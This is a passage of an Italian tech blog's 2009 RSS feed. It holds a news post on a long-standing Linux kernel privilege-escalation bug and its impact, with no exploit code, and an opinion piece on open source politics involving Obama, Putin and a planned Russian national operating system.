NotizieFlash" alt="Aggiungi '10 Buoni Motivi per Installare Linux' a NotizieFlash" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://twitter.com/home?status=http://www.pillolhacking.net/2009/12/16/10-buoni-motivi-per-installare-linux/" title="Aggiungi '10 Buoni Motivi per Installare Linux' a Twitter"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/twitter.png" title="Aggiungi '10 Buoni Motivi per Installare Linux' a Twitter" alt="Aggiungi '10 Buoni Motivi per Installare Linux' a Twitter" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.technotizie.it/posta_ok?action=f2&amp;title=10+Buoni+Motivi+per+Installare+Linux&amp;url=http://www.pillolhacking.net/2009/12/16/10-buoni-motivi-per-installare-linux/" title="Aggiungi '10 Buoni Motivi per Installare Linux' a Technotizie"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/technotizie.png" title="Aggiungi '10 Buoni Motivi per Installare Linux' a Technotizie" alt="Aggiungi '10 Buoni Motivi per Installare Linux' a Technotizie" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://friendfeed.com/share/bookmarklet/frame#title=10+Buoni+Motivi+per+Installare+Linux&amp;url=http://www.pillolhacking.net/2009/12/16/10-buoni-motivi-per-installare-linux/" title="Aggiungi '10 Buoni Motivi per Installare Linux' a FriendFeed"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/friendfeed.png" title="Aggiungi '10 Buoni Motivi per Installare Linux' a FriendFeed" alt="Aggiungi '10 Buoni Motivi per Installare Linux' a FriendFeed" /></a></div>
<!-- Social Bookmarking Reloaded END -->]]></content:encoded>
			<wfw:commentRss>http://www.pillolhacking.net/2009/12/16/10-buoni-motivi-per-installare-linux/feed/</wfw:commentRss>
		<slash:comments>22</slash:comments>
		</item>
		<item>
		<title>Trovato un Grave Bug nel Kernel di Linux Vecchio di Otto Anni</title>
		<link>http://www.pillolhacking.net/2009/08/19/trovato-un-grave-bug-nel-kernel-di-linux-vecchio-di-otto-anni/</link>
		<comments>http://www.pillolhacking.net/2009/08/19/trovato-un-grave-bug-nel-kernel-di-linux-vecchio-di-otto-anni/#comments</comments>
		<pubDate>Wed, 19 Aug 2009 13:32:11 +0000</pubDate>
		<dc:creator>Angelo Righi</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Hacking]]></category>

		<guid isPermaLink="false">http://www.pillolhacking.net/?p=719</guid>
		<description><![CDATA[E&#8217; stato scoperto un grave bug nel kernel di Linux che permette ad un utente qualsiasi di ottenere i privilegi di root. Questo bug, vecchio di otto anni, affligge praticamente tutti i sistemi Linux attualmente in circolazione. Una patch è stata realizzata e distribuita. Sono già disponibili online divesi exploit in grado di sfruttare questa [...]]]></description>
			<content:encoded><![CDATA[<p>E&#8217; stato scoperto un grave bug nel kernel di Linux che permette ad un utente qualsiasi di ottenere i privilegi di root. Questo bug, vecchio di otto anni, affligge praticamente tutti i sistemi Linux attualmente in circolazione. Una patch è stata realizzata e distribuita.</p>
<p>Sono già disponibili online divesi exploit in grado di sfruttare questa vulnerabilità. Quale può essere l&#8217;impatto di questo bug? Il fatto che si tratti di un attacco locale, non direttamente sfruttabile da remoto, non deve trarre in inganno, si tratta di un problema grave.</p>
<p>Intanto perchè qualsiasi utente, anche con privilegi minimi, sfruttando questo bug può diventare &#8220;root&#8221; (super-utente) ed ottenere il controllo totale del sistema. Inoltre un attacco locale può essere anche sferrato in seguito ad un attacco remoto. Questo significa che attaccando un banale bug di una applicazione web come un forum o un cms, l&#8217;hacker può ottenere l&#8217;accesso al sistema, seppur con privilegi bassi; ma sfruttando il bug nel kernel di Linux i &#8220;super-poteri&#8221; sono assicuarti;   <a id="u32b" title="dilagare prima nel sistema e poi eventualmente nell'intero network" href="../2009/03/10/da-sql-injection-a-root-in-12-passi/">dilagare prima nel sistema e poi eventualmente nell&#8217;intero network</a> sarà un gioco da ragazzi.</p>
<p>Uno scenario particolarmente realistico è quello del mass-defacement. Chi offre servizi di hosting, in particolare lo shared-hosting, dove diversi siti risiedono su di una stessa macchina, <a id="t6:d" title="soffrirà in modo particolare di questo problema" href="http://isc.sans.org/diary.html?storyid=6982">soffrirà in modo particolare di questo problema</a>. Basterà un Joomla non patchato per consegnare tutti i siti ospitati sulla macchina vulnerabile ai pirati.</p>
<p>Per concludere voglio segnalare che qualche mese fa <a id="i9jv" title="Microsoft sistemò un bug di Windows vecchio di 7 anni" href="../2008/11/19/uno-zero-day-lungo-sette-anni/">Microsoft sistemò un bug di Windows vecchio di 7 anni</a>: questo bug di Linux è vecchio di 8 anni. In questo caso Microsoft non ha il monopolio.</p>
<!-- Social Bookmarking Reloaded BEGIN --><div class="social_bookmark"><em>Segnala presso:</em><br /><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://del.icio.us/post?url=http://www.pillolhacking.net/2009/08/19/trovato-un-grave-bug-nel-kernel-di-linux-vecchio-di-otto-anni/&amp;title=Trovato+un+Grave+Bug+nel+Kernel+di+Linux+Vecchio+di+Otto+Anni" title="Aggiungi 'Trovato un Grave Bug nel Kernel di Linux Vecchio di Otto Anni' a Del.icio.us"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/delicious.png" title="Aggiungi 'Trovato un Grave Bug nel Kernel di Linux Vecchio di Otto Anni' a Del.icio.us" alt="Aggiungi 'Trovato un Grave Bug nel Kernel di Linux Vecchio di Otto Anni' a Del.icio.us" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://digg.com/submit?phase=2&amp;url=http://www.pillolhacking.net/2009/08/19/trovato-un-grave-bug-nel-kernel-di-linux-vecchio-di-otto-anni/&amp;title=Trovato+un+Grave+Bug+nel+Kernel+di+Linux+Vecchio+di+Otto+Anni" title="Aggiungi 'Trovato un Grave Bug nel Kernel di Linux Vecchio di Otto Anni' a digg"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/digg.png" title="Aggiungi 'Trovato un Grave Bug nel Kernel di Linux Vecchio di Otto Anni' a digg" alt="Aggiungi 'Trovato un Grave Bug nel Kernel di Linux Vecchio di Otto Anni' a digg" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.technorati.com/faves?add=http://www.pillolhacking.net/2009/08/19/trovato-un-grave-bug-nel-kernel-di-linux-vecchio-di-otto-anni/" title="Aggiungi 'Trovato un Grave Bug nel Kernel di Linux Vecchio di Otto Anni' a Technorati"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/technorati.png" title="Aggiungi 'Trovato un Grave Bug nel Kernel di Linux Vecchio di Otto Anni' a Technorati" alt="Aggiungi 'Trovato un Grave Bug nel Kernel di Linux Vecchio di Otto Anni' a Technorati" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.google.com/bookmarks/mark?op=edit&amp;output=popup&amp;bkmk=http://www.pillolhacking.net/2009/08/19/trovato-un-grave-bug-nel-kernel-di-linux-vecchio-di-otto-anni/&amp;title=Trovato+un+Grave+Bug+nel+Kernel+di+Linux+Vecchio+di+Otto+Anni" title="Aggiungi 'Trovato un Grave Bug nel Kernel di Linux Vecchio di Otto Anni' a Google Bookmarks"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/google.png" title="Aggiungi 'Trovato un Grave Bug nel Kernel di Linux Vecchio di Otto Anni' a Google Bookmarks" alt="Aggiungi 'Trovato un Grave Bug nel Kernel di Linux Vecchio di Otto Anni' a Google Bookmarks" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://segnalo.alice.it/post.html.php?url=http://www.pillolhacking.net/2009/08/19/trovato-un-grave-bug-nel-kernel-di-linux-vecchio-di-otto-anni/&amp;title=Trovato+un+Grave+Bug+nel+Kernel+di+Linux+Vecchio+di+Otto+Anni" title="Aggiungi 'Trovato un Grave Bug nel Kernel di Linux Vecchio di Otto Anni' a Segnalo"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/segnalo.png" title="Aggiungi 'Trovato un Grave Bug nel Kernel di Linux Vecchio di Otto Anni' a Segnalo" alt="Aggiungi 'Trovato un Grave Bug nel Kernel di Linux Vecchio di Otto Anni' a Segnalo" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://oknotizie.alice.it/post?url=http://www.pillolhacking.net/2009/08/19/trovato-un-grave-bug-nel-kernel-di-linux-vecchio-di-otto-anni/&amp;title=Trovato+un+Grave+Bug+nel+Kernel+di+Linux+Vecchio+di+Otto+Anni" title="Aggiungi 'Trovato un Grave Bug nel Kernel di Linux Vecchio di Otto Anni' a OKnotizie"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/oknotizie.gif" title="Aggiungi 'Trovato un Grave Bug nel Kernel di Linux Vecchio di Otto Anni' a OKnotizie" alt="Aggiungi 'Trovato un Grave Bug nel Kernel di Linux Vecchio di Otto Anni' a OKnotizie" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.diggita.it/submit.php?title=Trovato+un+Grave+Bug+nel+Kernel+di+Linux+Vecchio+di+Otto+Anni&amp;url=http://www.pillolhacking.net/2009/08/19/trovato-un-grave-bug-nel-kernel-di-linux-vecchio-di-otto-anni/" title="Aggiungi 'Trovato un Grave Bug nel Kernel di Linux Vecchio di Otto Anni' a Diggita"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/diggita.png" title="Aggiungi 'Trovato un Grave Bug nel Kernel di Linux Vecchio di Otto Anni' a Diggita" alt="Aggiungi 'Trovato un Grave Bug nel Kernel di Linux Vecchio di Otto Anni' a Diggita" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.facebook.com/share.php?u=http://www.pillolhacking.net/2009/08/19/trovato-un-grave-bug-nel-kernel-di-linux-vecchio-di-otto-anni/&amp;t=Trovato+un+Grave+Bug+nel+Kernel+di+Linux+Vecchio+di+Otto+Anni" title="Aggiungi 'Trovato un Grave Bug nel Kernel di Linux Vecchio di Otto Anni' a FaceBook"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/facebook.png" title="Aggiungi 'Trovato un Grave Bug nel Kernel di Linux Vecchio di Otto Anni' a FaceBook" alt="Aggiungi 'Trovato un Grave Bug nel Kernel di Linux Vecchio di Otto Anni' a FaceBook" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.upnews.it/submit?url=http://www.pillolhacking.net/2009/08/19/trovato-un-grave-bug-nel-kernel-di-linux-vecchio-di-otto-anni/&amp;title=Trovato+un+Grave+Bug+nel+Kernel+di+Linux+Vecchio+di+Otto+Anni" title="Aggiungi 'Trovato un Grave Bug nel Kernel di Linux Vecchio di Otto Anni' a Upnews"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/upnews.png" title="Aggiungi 'Trovato un Grave Bug nel Kernel di Linux Vecchio di Otto Anni' a Upnews" alt="Aggiungi 'Trovato un Grave Bug nel Kernel di Linux Vecchio di Otto Anni' a Upnews" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://notizieflash.com/submit.php?title=Trovato+un+Grave+Bug+nel+Kernel+di+Linux+Vecchio+di+Otto+Anni&amp;url=http://www.pillolhacking.net/2009/08/19/trovato-un-grave-bug-nel-kernel-di-linux-vecchio-di-otto-anni/" title="Aggiungi 'Trovato un Grave Bug nel Kernel di Linux Vecchio di Otto Anni' a NotizieFlash"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/notizieflash.png" title="Aggiungi 'Trovato un Grave Bug nel Kernel di Linux Vecchio di Otto Anni' a NotizieFlash" alt="Aggiungi 'Trovato un Grave Bug nel Kernel di Linux Vecchio di Otto Anni' a NotizieFlash" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://twitter.com/home?status=http://www.pillolhacking.net/2009/08/19/trovato-un-grave-bug-nel-kernel-di-linux-vecchio-di-otto-anni/" title="Aggiungi 'Trovato un Grave Bug nel Kernel di Linux Vecchio di Otto Anni' a Twitter"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/twitter.png" title="Aggiungi 'Trovato un Grave Bug nel Kernel di Linux Vecchio di Otto Anni' a Twitter" alt="Aggiungi 'Trovato un Grave Bug nel Kernel di Linux Vecchio di Otto Anni' a Twitter" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.technotizie.it/posta_ok?action=f2&amp;title=Trovato+un+Grave+Bug+nel+Kernel+di+Linux+Vecchio+di+Otto+Anni&amp;url=http://www.pillolhacking.net/2009/08/19/trovato-un-grave-bug-nel-kernel-di-linux-vecchio-di-otto-anni/" title="Aggiungi 'Trovato un Grave Bug nel Kernel di Linux Vecchio di Otto Anni' a Technotizie"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/technotizie.png" title="Aggiungi 'Trovato un Grave Bug nel Kernel di Linux Vecchio di Otto Anni' a Technotizie" alt="Aggiungi 'Trovato un Grave Bug nel Kernel di Linux Vecchio di Otto Anni' a Technotizie" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://friendfeed.com/share/bookmarklet/frame#title=Trovato+un+Grave+Bug+nel+Kernel+di+Linux+Vecchio+di+Otto+Anni&amp;url=http://www.pillolhacking.net/2009/08/19/trovato-un-grave-bug-nel-kernel-di-linux-vecchio-di-otto-anni/" title="Aggiungi 'Trovato un Grave Bug nel Kernel di Linux Vecchio di Otto Anni' a FriendFeed"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/friendfeed.png" title="Aggiungi 'Trovato un Grave Bug nel Kernel di Linux Vecchio di Otto Anni' a FriendFeed" alt="Aggiungi 'Trovato un Grave Bug nel Kernel di Linux Vecchio di Otto Anni' a FriendFeed" /></a></div>
<!-- Social Bookmarking Reloaded END -->]]></content:encoded>
			<wfw:commentRss>http://www.pillolhacking.net/2009/08/19/trovato-un-grave-bug-nel-kernel-di-linux-vecchio-di-otto-anni/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>La Guerra Fredda dell&#8217;Open-Source</title>
		<link>http://www.pillolhacking.net/2009/02/02/la-guerra-fredda-dellopen-source/</link>
		<comments>http://www.pillolhacking.net/2009/02/02/la-guerra-fredda-dellopen-source/#comments</comments>
		<pubDate>Mon, 02 Feb 2009 05:21:06 +0000</pubDate>
		<dc:creator>Angelo Righi</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[politica]]></category>

		<guid isPermaLink="false">http://www.pillolhacking.net/?p=278</guid>
		<description><![CDATA[Non ho particolare simpatia per il nuovo presidente USA Barack Obama, anzi ho molti dubbi. Basta guardare chi sono i suoi finanziatori e da chi è formato lo staff che ha portato l&#8217;ex senatore alla Casa Bianca per avere moltissimi sospettii. Una cosa però veramente ridicola è l&#8217;obamismo, l&#8217;atteggiamento isterico che ha pervaso l&#8217;opinione pubblica [...]]]></description>
			<content:encoded><![CDATA[<p>Non ho particolare simpatia per il nuovo presidente USA Barack Obama, anzi ho molti dubbi. Basta guardare chi sono <a id="z2s4" title="i suoi finanziatori e da chi è formato lo staff" href="../2008/11/07/la-microsoft-sostiene-obama/">i suoi finanziatori e da chi è formato lo staff</a> che ha portato l&#8217;ex senatore alla Casa Bianca per avere moltissimi sospettii.</p>
<p>Una cosa però veramente ridicola è l&#8217;<em>obamismo, </em>l&#8217;atteggiamento isterico che ha pervaso l&#8217;opinione pubblica mondiale (e italiana), autentica mania di massa, misura dell&#8217;irrazionalità e della capacità propagandistica dei media.</p>
<p>Un esempio di questo <em>obamismo</em> è l&#8217;articolo <a id="ust:" title="Obama Apre all'Open Source, Brunetta firma un accordo con Microsoft" href="http://www.geekissimo.com/2009/01/23/obama-apre-allopen-source-brunetta-firma-un-accordo-con-microsoft/">Obama Apre all&#8217;Open Source, Brunetta firma un accordo con Microsoft</a> apparso su Geekissimo. In realtà una non-notizia. La presunta apertura di Obama all&#8217;open source (attenzione, non a Linux):</p>
<blockquote><p>&#8220;Secondo quanto riportato dalla <strong><a href="http://news.bbc.co.uk/1/hi/technology/7841486.stm" target="_blank">BBC</a></strong>, infatti, tra una telefonata ai leader mediorientali ed un’occhiata alla crisi globale, il neo-presidente a stelle e strisce ha trovato il tempo di affidare a Scott McNealy, co-fondatore di <strong>Sun Microsystems</strong>, la stesura di un progetto relativo all’<strong>adozione dei software open source nella pubblica amministrazione</strong>&#8220;</p></blockquote>
<p>Quindi la fonte sarebbe la BBC, si parlerebbe genericamente di open-source nel contesto di un fumoso progetto. Poco più che un gossip. Però è Obama e quindi è come se ormai gli USA utilizzassero Linux ovunque.</p>
<p>Dall&#8217;altra parte si parlava di un accordo siglato tra Brunetta e Microsoft, non una cosa fumosa ma nero su bianco, per digitalizzare le strutture pubbliche a costo zero! Però lo ha fatto Brunetta ed essendo il ministro italiano si tratta comunque di una porcheria! I cattivi frutti dell&#8217;anti-politica e  un po&#8217; di banalità.</p>
<p>Torniamo ad Obama per introdurre un nuovo attore in questa commedia del rapporto tra open-source e Stati. Come dicevo ho molti dubbi sul nuovo presidente americano. Però potrebbe sorprendermi, ribellarsi ai mariuoli che ha intorno e che lo hanno messo lì e diventare veramente un buon presidente. Un precedente esiste: è il caso di Vladimir Putin.</p>
<p>L&#8217;ex presidente russo (attuale primo ministro) fu portato al Cremlino da una cricca delinquenziale per garantire la continuità dell&#8217;amministrazione mafiosa di Eltsin , l&#8217;epoca degli oligarchi filo-occidentali impegnati a derubare la Russia delle proprie risorse per metterle nelle mani della finanza internazionale, ovvero quelli che hanno provocato la catastrofe finanziaria.</p>
<p>Ebbene Putin, evidentemente supportato da una potente lobby che per anni era rimasta nell&#8217;ombra, dormiente in attesa di tempi migliori, lobby basata sullo scheletro dell&#8217;ex KGB, è riuscito nel giro di pochi anni ad affrancare la Russia dalle ruberie dell&#8217;imperialismo anglo-americano. Se c&#8217;è riuscito Putin ce la potrebbe fare anche Obama.</p>
<p>L&#8217;azione di Putin e il progressivo affrancamento russo dalla pressione imperialista anglo-americana ha avuto naturalmente la conseguenza di una campagna mediatica, militare ed economica aggressiva verso la nuova leadership russa. Nella visione manichea della realtà-Matrix creata dai media filo-occidentali, Putin diventa un potenziale &#8220;nuovo Hitler&#8221; di turno.</p>
<p>Forse anche per questo motivo alcune notizie dalla potenza eurasiatica passano in secondo piano. Per esempio la Russia <a id="f3ja" title="avrebbe intenzione di creare un &quot;sistema operativo nazionale&quot;" href="http://opendotdotdot.blogspot.com/2009/01/russia-to-create-national-os-based-on.html">avrebbe intenzione di creare un &#8220;sistema operativo nazionale&#8221;</a> per sostituire Windows. La proposta verrà presentata prossimamente alla Duma, il parlamento russo.<br />
Il sistema operativo nazionale dovrebbe essere basato su GNU/Linux.</p>
<p>Questa è una notizia più concreta rispetto al vago e fantomatico progetto obamiano. Se la scelta di Mosca verso l&#8217;adozione di un sistema operativo nazionale alternativo alla dittatura microsoftiana (e quindi americana) dovesse andare a buon fine, rappresenterebbe un passo importantissimo verso una dipendenza meno marcata dagli USA, sarebbe un esempio che l&#8217;Italia e l&#8217;Europa dovrebbero seguire, magari in collaborazione con la potenza dell&#8217;Est.</p>
<p>Staremo a vedere chi vincerà la guerra fredda dell&#8217;open-source.</p>
<!-- Social Bookmarking Reloaded BEGIN --><div class="social_bookmark"><em>Segnala presso:</em><br /><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://del.icio.us/post?url=http://www.pillolhacking.net/2009/02/02/la-guerra-fredda-dellopen-source/&amp;title=La+Guerra+Fredda+dell%26%238217%3BOpen-Source" title="Aggiungi 'La Guerra Fredda dell&#8217;Open-Source' a Del.icio.us"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/delicious.png" title="Aggiungi 'La Guerra Fredda dell&#8217;Open-Source' a Del.icio.us" alt="Aggiungi 'La Guerra Fredda dell&#8217;Open-Source' a Del.icio.us" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://digg.com/submit?phase=2&amp;url=http://www.pillolhacking.net/2009/02/02/la-guerra-fredda-dellopen-source/&amp;title=La+Guerra+Fredda+dell%26%238217%3BOpen-Source" title="Aggiungi 'La Guerra Fredda dell&#8217;Open-Source' a digg"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/digg.png" title="Aggiungi 'La Guerra Fredda dell&#8217;Open-Source' a digg" alt="Aggiungi 'La Guerra Fredda dell&#8217;Open-Source' a digg" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.technorati.com/faves?add=http://www.pillolhacking.net/2009/02/02/la-guerra-fredda-dellopen-source/" title="Aggiungi 'La Guerra Fredda dell&#8217;Open-Source' a Technorati"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/technorati.png" title="Aggiungi 'La Guerra Fredda dell&#8217;Open-Source' a Technorati" alt="Aggiungi 'La Guerra Fredda dell&#8217;Open-Source' a Technorati" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.google.com/bookmarks/mark?op=edit&amp;output=popup&amp;bkmk=http://www.pillolhacking.net/2009/02/02/la-guerra-fredda-dellopen-source/&amp;title=La+Guerra+Fredda+dell%26%238217%3BOpen-Source" title="Aggiungi 'La Guerra Fredda dell&#8217;Open-Source' a Google Bookmarks"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/google.png" title="Aggiungi 'La Guerra Fredda dell&#8217;Open-Source' a Google Bookmarks" alt="Aggiungi 'La Guerra Fredda dell&#8217;Open-Source' a Google Bookmarks" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://segnalo.alice.it/post.html.php?url=http://www.pillolhacking.net/2009/02/02/la-guerra-fredda-dellopen-source/&amp;title=La+Guerra+Fredda+dell%26%238217%3BOpen-Source" title="Aggiungi 'La Guerra Fredda dell&#8217;Open-Source' a Segnalo"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/segnalo.png" title="Aggiungi 'La Guerra Fredda dell&#8217;Open-Source' a Segnalo" alt="Aggiungi 'La Guerra Fredda dell&#8217;Open-Source' a Segnalo" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://oknotizie.alice.it/post?url=http://www.pillolhacking.net/2009/02/02/la-guerra-fredda-dellopen-source/&amp;title=La+Guerra+Fredda+dell%26%238217%3BOpen-Source" title="Aggiungi 'La Guerra Fredda dell&#8217;Open-Source' a OKnotizie"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/oknotizie.gif" title="Aggiungi 'La Guerra Fredda dell&#8217;Open-Source' a OKnotizie" alt="Aggiungi 'La Guerra Fredda dell&#8217;Open-Source' a OKnotizie" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.diggita.it/submit.php?title=La+Guerra+Fredda+dell%26%238217%3BOpen-Source&amp;url=http://www.pillolhacking.net/2009/02/02/la-guerra-fredda-dellopen-source/" title="Aggiungi 'La Guerra Fredda dell&#8217;Open-Source' a Diggita"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/diggita.png" title="Aggiungi 'La Guerra Fredda dell&#8217;Open-Source' a Diggita" alt="Aggiungi 'La Guerra Fredda dell&#8217;Open-Source' a Diggita" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.facebook.com/share.php?u=http://www.pillolhacking.net/2009/02/02/la-guerra-fredda-dellopen-source/&amp;t=La+Guerra+Fredda+dell%26%238217%3BOpen-Source" title="Aggiungi 'La Guerra Fredda dell&#8217;Open-Source' a FaceBook"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/facebook.png" title="Aggiungi 'La Guerra Fredda dell&#8217;Open-Source' a FaceBook" alt="Aggiungi 'La Guerra Fredda dell&#8217;Open-Source' a FaceBook" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.upnews.it/submit?url=http://www.pillolhacking.net/2009/02/02/la-guerra-fredda-dellopen-source/&amp;title=La+Guerra+Fredda+dell%26%238217%3BOpen-Source" title="Aggiungi 'La Guerra Fredda dell&#8217;Open-Source' a Upnews"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/upnews.png" title="Aggiungi 'La Guerra Fredda dell&#8217;Open-Source' a Upnews" alt="Aggiungi 'La Guerra Fredda dell&#8217;Open-Source' a Upnews" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://notizieflash.com/submit.php?title=La+Guerra+Fredda+dell%26%238217%3BOpen-Source&amp;url=http://www.pillolhacking.net/2009/02/02/la-guerra-fredda-dellopen-source/" title="Aggiungi 'La Guerra Fredda dell&#8217;Open-Source' a NotizieFlash"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/notizieflash.png" title="Aggiungi 'La Guerra Fredda dell&#8217;Open-Source' a NotizieFlash" alt="Aggiungi 'La Guerra Fredda dell&#8217;Open-Source' a NotizieFlash" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://twitter.com/home?status=http://www.pillolhacking.net/2009/02/02/la-guerra-fredda-dellopen-source/" title="Aggiungi 'La Guerra Fredda dell&#8217;Open-Source' a Twitter"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/twitter.png" title="Aggiungi 'La Guerra Fredda dell&#8217;Open-Source' a Twitter" alt="Aggiungi 'La Guerra Fredda dell&#8217;Open-Source' a Twitter" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.technotizie.it/posta_ok?action=f2&amp;title=La+Guerra+Fredda+dell%26%238217%3BOpen-Source&amp;url=http://www.pillolhacking.net/2009/02/02/la-guerra-fredda-dellopen-source/" title="Aggiungi 'La Guerra Fredda dell&#8217;Open-Source' a Technotizie"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/technotizie.png" title="Aggiungi 'La Guerra Fredda dell&#8217;Open-Source' a Technotizie" alt="Aggiungi 'La Guerra Fredda dell&#8217;Open-Source' a Technotizie" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://friendfeed.com/share/bookmarklet/frame#title=La+Guerra+Fredda+dell%26%238217%3BOpen-Source&amp;url=http://www.pillolhacking.net/2009/02/02/la-guerra-fredda-dellopen-source/" title="Aggiungi 'La Guerra Fredda dell&#8217;Open-Source' a FriendFeed"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/friendfeed.png" title="Aggiungi 'La 